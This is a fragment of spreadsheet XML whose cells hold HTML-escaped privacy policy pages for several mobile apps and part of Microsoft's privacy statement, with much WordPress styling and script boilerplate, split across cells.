&lt;title&gt;Metamorphabet for Android Privacy Policy&lt;/title&gt;
&lt;/head&gt;
&lt;body bgcolor=#ffffff&gt;
&lt;center&gt;PRIVACY POLICY: METAMORPHABET (ANDROID)&lt;/center&gt;&lt;br&gt;
&lt;center&gt;Metamorphabet does not ask users for any personal data,&lt;/center&gt;
&lt;center&gt;and does not otherwise collect or save data,&lt;/center&gt;
&lt;center&gt;with the exception of anonymous crash logs.&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>﻿&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;h1 style="text-align: center"&gt;Miga Game - Your Best Friend&lt;/h1&gt;_x005F_x000D_
&lt;div align="center"&gt;&lt;img src="logo.jpg"/&gt;&lt;/div&gt;_x005F_x000D_
&lt;h1&gt;PRIVACY POLICY&lt;/h1&gt;_x005F_x000D_
&lt;p&gt; We do not collect and save from your social account  in any form or sell any information to advertisers or other operators.&lt;/p&gt;_x005F_x000D_
&lt;h3&gt;Children’s Privacy&lt;/h3&gt;_x005F_x000D_
&lt;p&gt; There are no third-party ads in our apps, but we do cross promote our other products or the products on our related companies.</t>
  </si>
  <si>
    <t>The only third party service providers we use in our apps are to support our internal operations and we do not collect anything that is personally identifiable in our apps for children._x005F_x000D_
To help us provide you with the best service, APPLE ,GOOGLE help us to understand your use of the apps. In association with them, we may collect your unique device identifier, IP address, mobile phone carrier, game progress, time spent playing, and achievements. This information is for internal use only and can’t be shared.</t>
  </si>
  <si>
    <t>It’s just for us to help us improve our services for you._x005F_x000D_
 If you have any questions about our collection and use please contact us at support@xihegame.com_x005F_x000D_
&lt;/p&gt;_x005F_x000D_
&lt;h3&gt;More About Personal Data&lt;/h3&gt;_x005F_x000D_
&lt;p&gt;We collect personal data when a parent makes a purchase through our online store, subscribes to a newsletter or alert, submits content to a forum or blog, or requests technical support. This data may include a name (screen or nickname), gender, birth date, email address, mailing or shipping address, telephone number, and payment information.</t>
  </si>
  <si>
    <t>This information may be used to provide services and the sites to you, to process and fulfill your orders, to contact parents about their orders and new services and features and to send push notifications if consent to receive them has been given. If you contact us for help we will only use your email address to reply to your question.  Please note that if a parent posts personal information about themselves in a community forum or blog in the parent section, in addition to being collected, this data is made public for others to see.</t>
  </si>
  <si>
    <t>The parent is responsible for the disclosure of any such data in those forums. More about Non Personal Data_x005F_x000D_
 If you’d like more information on this, please contact us at support@xihegame.com_x005F_x000D_
&lt;/p&gt;_x005F_x000D_
&lt;h3&gt;About Third-party SDK&lt;/h3&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>The following is the third-party SDK we are using. The SDK code contains various permissions, but we only allow the SDK to use network access, view WLAN connections, switch network connections, read and write external memory cards, and read mobile phone status and identity , Retrieve running applications, read installed application list permissions. The permission code included in the third-party SDK is as follows (not usage permission):_x005F_x000D_
&lt;/p&gt;_x005F_x000D_
&lt;p&gt;_x005F_x000D_
&lt;b&gt;(1) com.tencent.bugly (Bugly; Tencent Bugly) SDK &lt;/b&gt;contains the following permission codes: network access, view WLAN connection, get rough location, get precise location, read external memory card, write to external memory card, read Get the status and identity of the mobile phone, and retrieve the running applications;_x005F_x000D_
  The purpose of collecting information: for data statistics_x005F_x000D_
Information sharing subject:</t>
  </si>
  <si>
    <t>Tencent_x005F_x000D_
Collected information: device version, system version, generation ID, phone style, phone name, iccid, bssid, mac address, IMSI, IMEI_x005F_x000D_
Privacy policy link: &lt;a href="https://privacy.qq.com/document/preview/fc748b3d96224fdb825ea79e132c1a56"&gt;https://privacy.qq.com/document/preview/fc748b3d96224fdb825ea79e132c1a56&lt;/a&gt;_x005F_x000D_
&lt;/p&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;link rel="pingback" href="https://mindware.mobi/xmlrpc.php"&gt;
&lt;title&gt;Mind Games Pro &amp;#8211; Privacy Policy &amp;#8211; Mindware Consulting, Inc.&lt;/title&gt;
&lt;meta name="robots" content="max-image-preview:large" /&gt;
&lt;link rel="dns-prefetch" href="//fonts.googleapis.com" /&gt;
&lt;link rel="dns-prefetch" href="//s.w.org" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Mindware Consulting, Inc. &amp;raquo; Feed" href="https://mindware.mobi/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/mindware.mobi\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.1"}};
/*! This file is auto-generated */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[10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}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!important;
	margin: 0 0.07em !</t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel="stylesheet" id="wp-block-library-css" href="https://mindware.mobi/wp-includes/css/dist/block-library/style.min.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;style id="wp-block-library-theme-inline-css" type="text/css"&gt;
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-code&gt;code{font-family:Menlo,Consolas,monaco,monospace;color:#1e1e1e;padding:.8em 1em;border:1px solid #ddd;border-radius:4px}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-group:where(.has-background){padding:1.25em 2.375em}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto;opacity:.4}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
&lt;/style&gt;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42px;}.has-black-color{color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}
&lt;/style&gt;
&lt;link rel="stylesheet" id="accesspresslite-google-fonts-css" href="//fonts.googleapis.com/css?family=Open+Sans%3A400%2C400italic%2C300italic%2C300%2C600%2C600italic%7CLato%3A400%2C100%2C300%2C700%7CRoboto%3A400%2C300italic%2C300%2C700&amp;#038;ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-font-awesome-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/font-awesome.min.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-fancybox-css-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/nivo-lightbox.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-bx-slider-style-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/jquery.bxslider.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-woo-commerce-style-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/woocommerce.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-font-style-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/fonts.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-style-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/style.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;style id="accesspresslite-style-inline-css" type="text/css"&gt;
_x005F_x000D_
                .socials a,_x005F_x000D_
                .searchform .searchsubmit,_x005F_x000D_
                .header-text,_x005F_x000D_
                .main-navigation ul ul li:hover &gt; a,_x005F_x000D_
                .main-navigation ul ul li.current-menu-item &gt; a,_x005F_x000D_
                #latest-events a, .testimonial-sidebar a,_x005F_x000D_
                .search-results .posted-on a, .cat-links a:hover, a,_x005F_x000D_
                .body_template_two .right-header .socials</t>
  </si>
  <si>
    <t>a:hover,_x005F_x000D_
                .body_template_two #top-section .welcome-detail a.bttn,_x005F_x000D_
                .body_template_two #top-section h1 a,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t xml:space="preserve">.site-footer #top-footer .footer2.footer .aptf-tweet-content a.aptf-tweet-name,_x005F_x000D_
                .body_template_two #event_section #latest-events_template_two h1 a,_x005F_x000D_
                .body_template_two a.all-testimonial,_x005F_x000D_
                </t>
  </si>
  <si>
    <t>.body_template_two a.all-events,_x005F_x000D_
                .body_template_two .event-detail h4 a:hover,_x005F_x000D_
                .body_template_two .author.vcard</t>
  </si>
  <si>
    <t>a,_x005F_x000D_
                .body_template_two a .entry-date.published,_x005F_x000D_
                .body_template_two .entry-footer a:hover,_x005F_x000D_
                .body_template_two.left-sidebar .searchform</t>
  </si>
  <si>
    <t>.searchsubmit,_x005F_x000D_
                .body_template_two.both-sidebar .searchform .searchsubmit,_x005F_x000D_
                .body_template_two.left-sidebar a:hover,_x005F_x000D_
                .body_template_two.left-sidebar .sidebar .widget_recent_comments .url</t>
  </si>
  <si>
    <t>:hover,_x005F_x000D_
                .body_template_two .business-hours ul li a,_x005F_x000D_
                .body_template_two .featured-post.big-icon h2.has-icon .fa{_x005F_x000D_
                    color: #04A3ED_x005F_x000D_
                }_x005F_x000D_
                .socials</t>
  </si>
  <si>
    <t>a:hover,_x005F_x000D_
                .main-navigation,_x005F_x000D_
                #call-to-action,_x005F_x000D_
                .event-thumbnail .event-date,_x005F_x000D_
                .bttn:after,_x005F_x000D_
                .featured-post .featured-overlay,_x005F_x000D_
                #bottom-section,_x005F_x000D_
                .portofolio-layout .entry-title,_x005F_x000D_
                .event-date-archive,_x005F_x000D_
                #slider-banner .bx-wrapper .bx-pager.bx-default-pager a:after,_x005F_x000D_
                .body_template_two #site-navigation.main-navigation ul li:before,_x005F_x000D_
                .body_template_two .slider-caption .caption-title,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>#slider-banner .bx-wrapper .bx-pager.bx-default-pager a:after,_x005F_x000D_
                .body_template_two #top-section .welcome-detail a.bttn:after,_x005F_x000D_
                .body_template_two #call-to-action .action-btn,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>#mid-section .featured-post .featured-overlay,_x005F_x000D_
                .body_template_two .event-thumbnail .event-date,_x005F_x000D_
                .body_template_two .event-date-archive,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>a.cat-event-more.bttn:after,_x005F_x000D_
                .body_template_two .portofolio-layout .entry-title,_x005F_x000D_
                .body_template_two .entry-content .bttn:after,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>#bottom-section .testimonial-slider-wrap .bx-wrapper .bx-pager.bx-default-pager a:hover, .body_template_two #bottom-section .testimonial-slider-wrap .bx-wrapper .bx-pager.bx-default-pager a.active,_x005F_x000D_
                .navigation .nav-links a:hover, .bttn:hover, button:hover,_x005F_x000D_
                input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover{_x005F_x000D_
                    background: #04A3ED _x005F_x000D_
                }_x005F_x000D_
                .cat-portfolio-list:hover .portofolio-layout{_x005F_x000D_
                     background: rgba(4, 163, 237, 0.6)_x005F_x000D_
                }_x005F_x000D_
                .body_template_two #event_section #latest-events_template_two .event-list_two .event-date_two{_x005F_x000D_
                    background: rgba(4, 163, 237, 0.8)_x005F_x000D_
                }_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>.cat-portfolio-list:hover .portofolio-layout{_x005F_x000D_
                     background: rgba(4, 163, 237, 0.4)_x005F_x000D_
                }_ x000D_
                .main-navigation .current-menu-parent &gt; a,_x005F_x000D_
                .main-navigation .current-menu-item &gt; a,_x005F_x000D_
                .main-navigation .current_page_item &gt; a,_x005F_x000D_
                .main-navigation .current_page_parent &gt;</t>
  </si>
  <si>
    <t>a,_x005F_x000D_
                .bx-wrapper .bx-pager.bx-default-pager a,_x005F_x000D_
                .main-navigation li:hover &gt; a{_x005F_x000D_
                    background: #0382be;_x005F_x000D_
                }_x005F_x000D_
                .testimonial-wrap{_x005F_x000D_
                    background: #36b5f1 _x005F_x000D_
                }_x005F_x000D_
                .socials a,_x005F_x000D_
                .searchform,_x005F_x000D_
                .sidebar h3.widget-title,_x005F_x000D_
                .body_template_two .main-navigation .current-menu-parent &gt;</t>
  </si>
  <si>
    <t>a,_x005F_x000D_
                .main-navigation .current_page_parent &gt; a,_x005F_x000D_
                .body_template_two .main-navigation .current-menu-item &gt; a,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>.main-navigation .current_page_item &gt; a,_x005F_x000D_
                .body_template_two #site-navigation.main-navigation ul</t>
  </si>
  <si>
    <t>ul,_x005F_x000D_
                .body_template_two #call-to-action .action-btn,_x005F_x000D_
                .navigation .nav-links a, .bttn, button, input[type="button"], input[type="reset"], input[type="submit"],_x005F_x000D_
                .body_template_two .sidebar h3.widget-title,_x005F_x000D_
                .body_template_two.left-sidebar .searchform,_x005F_x000D_
                .body_template_two.both-sidebar .searchform,_x005F_x000D_
                .body_template_two</t>
  </si>
  <si>
    <t>.featured-post.big-icon h2.has-icon .fa{_x005F_x000D_
                    border-color: #04A3ED_x005F_x000D_
                }_x005F_x000D_
                .main-navigation,_x005F_x000D_
                .main-navigation ul ul{_x005F_x000D_
                     border-color: #0382be;_x005F_x000D_
                }_x005F_x000D_
                .testimonial-wrap:after{_x005F_x000D_
                    border-color: #36b5f1 transparent transparent; _x005F_x000D_
                }_x005F_x000D_
                #slider-banner .bx-wrapper .bx-pager.bx-default-pager a{_x005F_x000D_
                    box-shadow: 0 0 0 2px #04A3ED inset; _x005F_x000D_
                }_ x000D_
                @media screen and (max-width: 940px) {_x005F_x000D_
                    .main-navigation .menu li{_x005F_x000D_
                        background: #04A3ED;_x005F_x000D_
                    }_x005F_x000D_
_x005F_x000D_
                    .main-navigation .menu li{_x005F_x000D_
                        border-bottom-color: #0382be !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
                    }_x005F_x000D_
                }
&lt;/style&gt;
&lt;link rel="stylesheet" id="accesspresslite-keyboard-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/keyboard.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;link rel="stylesheet" id="accesspresslite-responsive-css" href="https://mindware.mobi/wp-content/themes/accesspress-lite/css/responsive.css?ver=5.9.1" type="text/css" media="all" /&gt;
&lt;script type="text/javascript" src="https://mindware.mobi/wp-includes/js/jquery/jquery.min.js?ver=3.6.0" id="jquery-core-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://mindware.mobi/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2" id="jquery-migrate-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://mindware.mobi/wp-content/themes/accesspress-lite/js/sticky-sidebar/theia-sticky-sidebar.js?ver=5.9.1" id="accesspresslite-stickey-sidebar-js-js"&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://mindware.mobi/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://mindware.mobi/wp-json/wp/v2/pages/491" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://mindware.mobi/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://mindware.mobi/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 5.9.1" /&gt;
&lt;link rel="canonical" href="https://mindware.mobi/mind-games-pro-privacy-policy/" /&gt;
&lt;link rel="shortlink" href="https://mindware.mobi/?p=491" /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://mindware.mobi/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmindware.mobi%2Fmind-games-pro-privacy-policy%2F" /&gt;
&lt;style type="text/css" id="custom-background-css"&gt;
body.custom-background { background-color: #fcfcfc; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-491 custom-background wp-embed-responsive body_template_one right-sidebar"&gt;
&lt;svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 0.49803921568627" /&gt;&lt;fefuncg type="table" tablevalues="0 0.49803921568627" /&gt;&lt;fefuncb</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.49803921568627"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id="wp-duotone-grayscale"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 1" /&gt;&lt;fefuncg type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0 1"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</si>
  <si>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hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-purple-yellow"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.54901960784314 0.98823529411765" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0.71764705882353 0.25490196078431"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id="wp-duotone-blue-red"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 1" /&gt;&lt;fefuncg type="table" tablevalues="0 0.27843137254902" /&gt;&lt;fefuncb type="table" tablevalues="0.5921568627451 0.27843137254902" /&gt;&lt;fefunca type="table" tablevalues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;fecomposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;svg</t>
  </si>
  <si>
    <t>xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-midnight"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 0" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.64705882352941" /&gt;&lt;fefuncb type="table" tablevalues="0 1"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id="wp-duotone-magenta-yellow"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.78039215686275 1" /&gt;&lt;fefuncg type="table" tablevalues="0 0.94901960784314" /&gt;&lt;fefuncb type="table" tablevalues="0.35294117647059 0.47058823529412" /&gt;&lt;fefunca</t>
  </si>
  <si>
    <t>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id="wp-duotone-purple-green"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114</t>
  </si>
  <si>
    <t>/&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.65098039215686 0.40392156862745" /&gt;&lt;fefuncg type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0.44705882352941 0.4" /&gt;&lt;fefunca type="table" tablevalues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;fecomposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-blue-orange"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.098039215686275 1" /&gt;&lt;fefuncg type="table" tablevalues="0 0.66274509803922" /&gt;&lt;fefuncb</t>
  </si>
  <si>
    <t>type="table" tablevalues="0.84705882352941 0.41960784313725" /&gt;&lt;fefunca type="table" tablevalues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;fecomposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;&lt;a class="skip-link screen-reader-text" href="#home-content"&gt;Skip to content&lt;/a&gt;
&lt;div id="page" class="site"&gt;
&lt;header id="masthead" class="site-header"&gt;
&lt;div id="top-header"&gt;
&lt;div class="ak-container"&gt;
&lt;div class="site-branding"&gt;
&lt;a href="https://mindware.mobi/"&gt;
&lt;img src="https://mindware.mobi/wp-content/uploads/2020/08/cropped-header-1.png" alt="Mindware Consulting, Inc."&gt;
&lt;/a&gt;
&lt;/div&gt;
&lt;div class="right-header clearfix"&gt;
&lt;div class="clearfix"&gt;&lt;/div&gt;
&lt;div class="ak-search"&gt;
&lt;form method="get" class="searchform" action="https://mindware.mobi/" role="search"&gt;
&lt;input type="text" name="s" value class="s" placeholder="Search..." /&gt;
&lt;button type="submit" name="submit" class="searchsubmit"&gt;&lt;i class="fa fa-search"&gt;&lt;/i&gt;&lt;/button&gt;
&lt;/form&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;nav id="site-navigation" class="main-navigation menu-left"&gt;
&lt;div class="ak-container"&gt;
&lt;button class="menu-toggle btn-transparent-toggle"&gt;Menu&lt;/button&gt;
&lt;div class="menu-main-menu-container"&gt;&lt;ul id="menu-main-menu" class="menu"&gt;&lt;li id="menu-item-349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-349"&gt;&lt;a href="https://mindware.mobi/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-375"&gt;&lt;a href="https://mindware.mobi/research/"&gt;Research&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-400" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-400"&gt;&lt;a href="https://mindware.mobi/__trashed/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt; &lt;/div&gt;
&lt;/nav&gt;
&lt;/header&gt;
&lt;section id="slider-banner"&gt;
&lt;/section&gt;
&lt;div id="content" class="site-content"&gt;
&lt;div class="ak-container"&gt;
&lt;div id="primary" class="content-area"&gt;
&lt;main id="main" class="site-main" role="main"&gt;
&lt;article id="post-491" class="post-491 page type-page status-publish hentry"&gt;
&lt;header class="entry-header"&gt;
&lt;h1 class="entry-title"&gt;Mind Games Pro &amp;#8211; Privacy Policy&lt;/h1&gt;
&lt;/header&gt;
&lt;div class="entry-content"&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
 &lt;p&gt;Last updated: August 13, 2021&lt;/p&gt;
&lt;p&gt;This Privacy Policy describes Our policies and procedures on the collection, use and disclosure of Your information when You use the Service and tells You about Your privacy rights and how the law protects You.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use Your Personal data to provide and improve the Service. By using the Service, You agree to the collection and use of information in accordance with this Privacy Policy.&lt;/p&gt;
&lt;h1&gt;Interpretation and Definitions&lt;/h1&gt;
&lt;h2&gt;Interpretation&lt;/h2&gt;
&lt;p&gt; The words of which the initial letter is capitalized have meanings defined under the following conditions.</t>
  </si>
  <si>
    <t>The following definitions shall have the same meaning regardless of whether they appear in singular or in plural.&lt;/p&gt;
&lt;h2&gt;Definitions&lt;/h2&gt;
&lt;p&gt;For the purposes of this Privacy Policy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Account&lt;/strong&gt; means a unique account created for You to access our Service or parts of our Service.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Affiliate&lt;/strong&gt; means an entity that controls, is controlled by or is under common control with a party, where &amp;#8220;control&amp;#8221; means ownership of 50% or more of the shares, equity interest or other securities entitled to vote for election of directors or other managing authority.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Application&lt;/strong&gt; means the software program provided by the Company downloaded by You on any electronic device, named Mind Games Pro&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Business&lt;/strong&gt;, for the purpose of the CCPA (California Consumer Privacy Act), refers to the Company as the legal entity that collects Consumers&amp;#8217; personal information and determines the purposes and means of the p</t>
  </si>
  <si>
    <t>﻿&lt;!DOCTYPE html &gt;&lt;html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"&gt;&lt;head&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;&lt;meta charset="utf-8" /&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1.0" /&gt;&lt;link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /&gt;&lt;script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js"&gt;_x005F_x000D_
			// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft.</t>
  </si>
  <si>
    <t>See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx._x005F_x000D_
    &lt;/script&gt;&lt;script type="text/javascript" language="javascript"&gt;/*&lt;![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]&gt;*/&lt;/script&gt;&lt;title&gt;Microsoft Privacy Statement – Microsoft privacy&lt;/title&gt;&lt;meta name="Title" content="Microsoft Privacy Statement – Microsoft privacy" /&gt;&lt;meta name="CorrelationVector" content="0000000000000000.0.0" /&gt;&lt;meta name="Description"</t>
  </si>
  <si>
    <t>content="The Microsoft Privacy Statement explains what personal data Microsoft collects and how the company uses it." /&gt;&lt;meta name="MscomContentLocale" content="en-us" /&gt;&lt;meta name="keywords" content="Microsoft, privacy, privacy statement" /&gt;&lt;link</t>
  </si>
  <si>
